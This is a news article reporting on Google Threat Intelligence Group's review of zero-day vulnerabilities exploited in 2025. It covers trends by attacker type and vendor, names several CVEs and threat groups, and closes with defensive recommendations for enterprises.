Google tracked 90 vulnerabilities exploited as zero-days last year, with Chinese cyberespionage groups doubling their count from 2024 and commercial surveillance vendors overtaking state-sponsored hackers for the first time. Nearly half of the recorded zero-days targeted enterprise technologies such as security appliances, VPNs, networking devices, and enterprise software platforms.

“Increased exploitation of security and networking devices highlights the critical risk that can be posed by trusted edge infrastructure, while targeting of enterprise software exhibits the value of highly interconnected platforms that provide privileged access across networks and data assets,” the Google Threat Intelligence Group (GTIG) said in its annual Zero-Days in Review report.

This represents a continuation of a shift in attacker initial-access patterns that intensified over the past few years. Enterprise software accounted for 44% of all zero-days in 2024 and 48% last year.

China-linked groups were responsible for at least 10 of the 16 zero-days attributed to state-sponsored threat actors in 2025, double the number attributed to them in 2024. This keeps China as the most prolific user of zero-day exploits of the past decade.

However, commercial surveillance vendors (CSVs) are also an ever-growing source of zero-day exploits. CSVs sell their products to law enforcement and intelligence agencies around the world, including authoritarian regimes that use the software to crack down on activists. CSVs provide zero-days they discover to their customers to facilitate the deployment of their spyware on targets’ mobile phones and computers.

Defenders face shrinking response windows

Vulnerability exploitation remains the top initial access method in incident response investigations conducted by Google’s Mandiant division, ahead of stolen credentials and phishing. With nearly half of last year’s zero-days hitting enterprise infrastructure, organizations that delay patching even for hours face increasing risk.

The speed at which exploit code spreads between groups is also accelerating, GTIG warned. Historically zero-day exploits were closely held by the most resourced teams, but an increasing number of PRC-linked groups are now exploiting the same vulnerabilities, suggesting increased exploit sharing or collaborative development.

The pattern extends to n-day vulnerabilities, where GTIG observed a shrinking gap between public disclosure and widespread exploitation by multiple groups. Data from vulnerability intelligence firm VulnCheck shows that nearly a third of the 884 vulnerabilities known to be exploited last year were attacked on or before the day they were publicly disclosed, up from about a quarter in 2024.

“Barely 1% of vulnerabilities disclosed in 2025 were ever exploited, but those that were moved faster, hit harder, and increasingly did so before defenders even had a chance to react,” VulnCheck CTO Jacob Baines said.

GTIG researchers expect AI to compress these timelines further this year, with adversaries using it to accelerate reconnaissance, vulnerability discovery, and exploit development. “Defenders should prepare for when, not if, a compromise happens,” the researchers warned.

Enterprise environments under siege

Chinese threat actors continued to display a preference for targets that are difficult to monitor and allow persistent access to strategic networks. Notable examples include the groups that GTIG tracks as UNC5221, which exploited a flaw in Ivanti Connect Secure (CVE-2025-0282) and UNC3886, which exploited a vulnerability in Juniper routers (CVE-2025-21590).

Another Chinese group tracked as UNC6201, which is known for the BRICKSTORM and GRIMBOLT backdoors, stood out because it targeted intellectual property such as source code and proprietary development documents from technology companies. Such assets could be used to discover new vulnerabilities in the victims’ products, posing a risk to their downstream customers.

Security and networking products accounted for 21 of the 43 enterprise-targeted zero-days in 2025, and at least 14 targeted edge devices such as routers, switches, and security appliances. These devices typically lack endpoint detection capabilities, leaving compromises undetected.

“A lack of input validation and incomplete authorization processes were common flaws within these products, demonstrating how basic systemic failures continue to persist, but are fixable with proper implementation standards and approaches,” the GTIG researchers wrote.

Financially motivated threat groups, including ransomware gangs also targeted enterprise technologies and accounted for nine zero-days in 2025, double the five attributed to them in 2024.

FIN11, the group behind the CL0P ransomware, targeted two zero-day flaws in Oracle E-Business Suite last year (CVE-2025-61882 and CVE-2025-61884). Storm-1175, a group associated with Medusa ransomware, exploited a vulnerability in GoAnywhere MFT (CVE-2025-10035).

Meanwhile UNC2165, a financially motivated Russian group that overlaps with public reporting on Evil Corp, used a zero-day WinRAR vulnerability (CVE-2025-8088). The same vulnerability was exploited by another Russian group tracked as UNC4895 or RomCom that conducts both financially motivated and espionage operations.

According to VulnCheck’s data, more than half of the 39 CVEs linked to ransomware attacks in 2025 were exploited as zero-days and about a third had no public or commercial exploit code as of January 2026, suggesting that these groups are developing their own exploits and keeping them private.

Spyware vendors surpass state-backed hackers for the first time

For the first time since GTIG began tracking zero-day exploitation, commercial surveillance vendors had more attributed zero-days than traditional state-sponsored espionage groups. The milestone reflects a gradual shift the researchers said they’ve observed over the past several years.

CSVs maintained their focus on mobile devices and browsers, adapting their exploit chains to bypass security improvements that platform vendors have introduced over time. Multiple exploit chains discovered in 2025 required three or more chained vulnerabilities to achieve a single objective on mobile devices, a sign that platform hardening is raising the cost of exploitation but not stopping it.

Operating system vulnerabilities accounted for 39 zero-days, with 15 impacting mobile OSes. Browsers fell below 10%, a historic low that GTIG attributed to hardening efforts, although the researchers noted the possibility that the groups have better operational security and some exploits have been missed.

Microsoft was the most targeted vendor, with 25 zero-days exploited across its products, followed by Google with 11, Apple with eight, and Cisco and Fortinet with four each. Twenty vendors were hit by a single zero-day each, illustrating how widely attackers are casting their net across the enterprise software landscape.

Prepare for zero-day exploitation

“Prioritization is a consistent struggle for most organizations due to limited resources requiring deciding what solutions are implemented — and for every choice of where to put resources, a different security need is neglected,” the GTIG researchers said. “Know your threats and your attack surface in order to prioritize decisions for best defending your systems and infrastructure.”

Recommendations include segmenting firewalls, VPNs, and DMZ infrastructure from core network assets and domain controllers to limit lateral movement when a perimeter device is breached.

Enterprises are also advised to establish baselines for system processes in order to flag living-off-the-land activity, and to deploy canary tokens to detect lateral movement. Maintaining a software bill of materials to identify which systems are affected when a new zero-day is disclosed is also recommended, particularly for widely used libraries where the blast radius is difficult to gauge.

Security leaders should also define emergency patching processes that can bypass standard change management when critical vulnerabilities require immediate action. When no patch is available, security teams should isolate affected systems and components with stop-gap measures such as disabling specific services or blocking ports at the perimeter.

GTIG urges organizations to maintain a real-time asset inventory and to design system architectures with segmentation and least-privilege access built in rather than bolted on.